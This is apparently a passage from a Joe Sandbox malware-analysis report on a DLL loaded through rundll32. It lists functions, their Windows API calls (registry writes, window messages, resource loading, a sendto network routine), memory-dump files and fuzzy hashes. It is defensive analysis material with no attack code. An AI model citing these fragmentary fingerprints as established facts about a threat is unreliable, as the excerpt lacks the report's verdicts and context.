                                                                                                          • Instruction Fuzzy Hash: 3D110134500761EFD714CF99D988AAAB7F8FF00399F51C429E84283550D770ED58DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10024E13, Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10024E1A
                                                                                                            • Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10024E50
                                                                                                          • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004DCF4,00000004,1000166C,8007000E), ref: 10024E7B
                                                                                                            • Part of subcall function 10023B77: __cftof.LIBCMT ref: 10023B88
                                                                                                          • LocalFree.KERNEL32(8007000E,8007000E), ref: 10024EA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1808948168-0
                                                                                                          • Opcode ID: a99d70be1c0dcc840c7ce1049e047e71ac8799dea147b88372324e332874e07f
                                                                                                          • Instruction ID: b82dd79aa3f9a22217a6a5774d94273f1735641f27abfa85c715a235195ff0cc
                                                                                                          • Opcode Fuzzy Hash: a99d70be1c0dcc840c7ce1049e047e71ac8799dea147b88372324e332874e07f
                                                                                                          • Instruction Fuzzy Hash: 2711C6B1604249BFEF01DFA4DC81DAE3BA9FF08350F628529F619CB1A1DB319950CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100217AE, Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 100217B5
                                                                                                            • Part of subcall function 1002299D: __EH_prolog3.LIBCMT ref: 100229A4
                                                                                                          • __strdup.LIBCMT ref: 100217D7
                                                                                                          • GetCurrentThread.KERNEL32 ref: 10021804
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 1002180D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                          • String ID:
                                                                                                          • API String ID: 4206445780-0
                                                                                                          • Opcode ID: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
                                                                                                          • Instruction ID: 63c4b4d8ed515ebd67a2d3fac6e93b486822e3c8ffac095a61f99a1b17b282e6
                                                                                                          • Opcode Fuzzy Hash: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
                                                                                                          • Instruction Fuzzy Hash: EC217DB8801B408EC321DF6A958124AFBF4FFA4600F50891FE5AAC7A22DBB4A441CF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10029178, Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 100291A4
                                                                                                          • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 100291CF
                                                                                                          • GetCapture.USER32 ref: 100291E1
                                                                                                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 100291F0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Capture
                                                                                                          • String ID:
                                                                                                          • API String ID: 1665607226-0
                                                                                                          • Opcode ID: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
                                                                                                          • Instruction ID: 9d500238946ec194ad8ffa17e766443115c43433aa0eeb43828134f684b4c91a
                                                                                                          • Opcode Fuzzy Hash: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
                                                                                                          • Instruction Fuzzy Hash: 8A0175713402557BDA205B629CCDF9B3E7AEBCAF50F510478F6089A0A7CAA14800D620
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002ABD3, Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 1002AC0E
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 1002AC17
                                                                                                          • swprintf.LIBCMT ref: 1002AC34
                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002AC45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 22681860-0
                                                                                                          • Opcode ID: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
                                                                                                          • Instruction ID: b3e5ac37a67a2c34724f7244494befea3428c85a23c18ad1ae006fcf60cdee60
                                                                                                          • Opcode Fuzzy Hash: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
                                                                                                          • Instruction Fuzzy Hash: C901ED76500218ABDB10DF688D85FAF77ACEB49714F51082AFA01E3141DB74ED0487A8
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10027E7D, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetTopWindow.USER32(00000000), ref: 10027E8D
                                                                                                          • GetTopWindow.USER32(00000000), ref: 10027ECC
                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 10027EEA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window
                                                                                                          • String ID:
                                                                                                          • API String ID: 2353593579-0
                                                                                                          • Opcode ID: afb69f6388361ddcc73f1cca2ae2c50509cd01f1d16e133e3ebac848732dfc51
                                                                                                          • Instruction ID: 7c1aa0b4fd0438a3880c8a8454d512b9e221987d8156c76486bb18807498cd50
                                                                                                          • Opcode Fuzzy Hash: afb69f6388361ddcc73f1cca2ae2c50509cd01f1d16e133e3ebac848732dfc51
                                                                                                          • Instruction Fuzzy Hash: 8101D33640062ABBDF139FA1AD05E9F3B6AFF492A0F424054FE1851060D736C961EBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1003B5D6, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                          • String ID:
                                                                                                          • API String ID: 3016257755-0
                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                          • Instruction ID: 1693f95a625ffde70028128af171decd196e1ba2c6c978d497889c3db2691634
                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                          • Instruction Fuzzy Hash: 85117E3680054ABFCF139E80CC028EE3F62FB09299F548415FF1958032C736D9B1AB81
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10027839, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32 ref: 10027846
                                                                                                          • GetTopWindow.USER32(00000000), ref: 10027859
                                                                                                            • Part of subcall function 10027839: GetWindow.USER32(00000000,00000002), ref: 100278A0
                                                                                                          • GetTopWindow.USER32(?), ref: 10027889
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Item
                                                                                                          • String ID:
                                                                                                          • API String ID: 369458955-0
                                                                                                          • Opcode ID: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
                                                                                                          • Instruction ID: f10d52d962ac960512d7384eec108a680d17f64428226a36a785d2fcb99e30ea
                                                                                                          • Opcode Fuzzy Hash: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
                                                                                                          • Instruction Fuzzy Hash: F301A23618166ABBCB229F51AC08E8F3A99FF417E0F814021FD0C91111DF31D911D6E1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A257, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindResourceA.KERNEL32(?,?,000000F0), ref: 1002A27D
                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A289
                                                                                                          • LockResource.KERNEL32(00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A296
                                                                                                          • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A2B2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1078018258-0
                                                                                                          • Opcode ID: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
                                                                                                          • Instruction ID: f3c4c51c49c486de2effa8659e681593a38c79611994fd5387b39b2d60b42ad5
                                                                                                          • Opcode Fuzzy Hash: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
                                                                                                          • Instruction Fuzzy Hash: B5F0C237200316BBD7019FAD9DC4A6B77ADEF866A17524038FE09D3210DE71DD448AB4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10001310, Relevance: 6.0, APIs: 4, Instructions: 41networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memsethtonsinet_addrsendto
                                                                                                          • String ID:
                                                                                                          • API String ID: 1158618643-0
                                                                                                          • Opcode ID: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
                                                                                                          • Instruction ID: 60f6b611a07b9dfdfd37c1fffb937be7e3926c5419f3fbf29161148c0f489d21
                                                                                                          • Opcode Fuzzy Hash: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
                                                                                                          • Instruction Fuzzy Hash: 7A015E75900208ABDB00DFA4C986BBF77B8FF48700F504459F90597281E770AA10DBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10023584, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 100235A4
                                                                                                          • GetActiveWindow.USER32 ref: 100235AF
                                                                                                          • SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,4463D444), ref: 100235BD
                                                                                                          • FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,4463D444), ref: 100235D9
                                                                                                            • Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ActiveEnable$FreeResource
                                                                                                          • String ID:
                                                                                                          • API String ID: 253586258-0
                                                                                                          • Opcode ID: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
                                                                                                          • Instruction ID: 11aa7c219ea7ea27b38022f450b92876966fee3fb2bcd7a89944b049f6e30275
                                                                                                          • Opcode Fuzzy Hash: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
                                                                                                          • Instruction Fuzzy Hash: 83F01934900B28CBDF12EF64D9855AD77B1FF88B02B900425E446B2161CB326E80CA65
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100337CF, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 100337DB
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 100337F2
                                                                                                          • __amsg_exit.LIBCMT ref: 10033800
                                                                                                          • __lock.LIBCMT ref: 10033810
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3521780317-0
                                                                                                          • Opcode ID: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
                                                                                                          • Instruction ID: dae39449bd8c003bde3e62b30ea038717af1cc855304bc2085dea34c93cae8e5
                                                                                                          • Opcode Fuzzy Hash: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
                                                                                                          • Instruction Fuzzy Hash: 72F06D7E909700AFE362DB74844674A37E0EF00762F118619B4419F3A1CF34B900CA91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002173A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10021762
                                                                                                          • PathFindExtensionA.SHLWAPI(?), ref: 10021778
                                                                                                            • Part of subcall function 100214CB: __EH_prolog3_GS.LIBCMT ref: 100214D5
                                                                                                            • Part of subcall function 100214CB: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
                                                                                                            • Part of subcall function 100214CB: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021555
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021563
                                                                                                            • Part of subcall function 100214CB: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
                                                                                                            • Part of subcall function 100214CB: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                                                                                          • String ID: %s%s.dll
                                                                                                          • API String ID: 1311856149-1649984862
                                                                                                          • Opcode ID: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
                                                                                                          • Instruction ID: cb1c0cb3582a3260588f521687d4e0582820240ed98e8e3d3c47ebba61cd8817
                                                                                                          • Opcode Fuzzy Hash: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
                                                                                                          • Instruction Fuzzy Hash: DA01D1759002289FDB10DB28DD45AEF77FCEB85700F4104A6E505E7150EA70AE04CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1003785E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 10030483: __getptd.LIBCMT ref: 10030489
                                                                                                            • Part of subcall function 10030483: __getptd.LIBCMT ref: 10030499
                                                                                                          • __getptd.LIBCMT ref: 1003786D
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 1003787B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718072866.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718121042.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 803148776-1018135373
                                                                                                          • Opcode ID: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
                                                                                                          • Instruction ID: 9bdde97464bd0678537997cb56ba83c365607814a506e3d314dec82bc4d239b5
                                                                                                          • Opcode Fuzzy Hash: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
                                                                                                          • Instruction Fuzzy Hash: 5C014B38841245CECB36CFA0D8446AEB7F6FF08253F51442EE0495EAA1DF30EA81CB51
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10002AB0, Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,1000308E,00000000,00000000), ref: 10002B05
                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 10002B47
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.717862909.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.717853222.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717964141.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.717984700.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718003974.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000004.00000002.718061167.0000000010084000.00000004.00020000.sdmp Download File
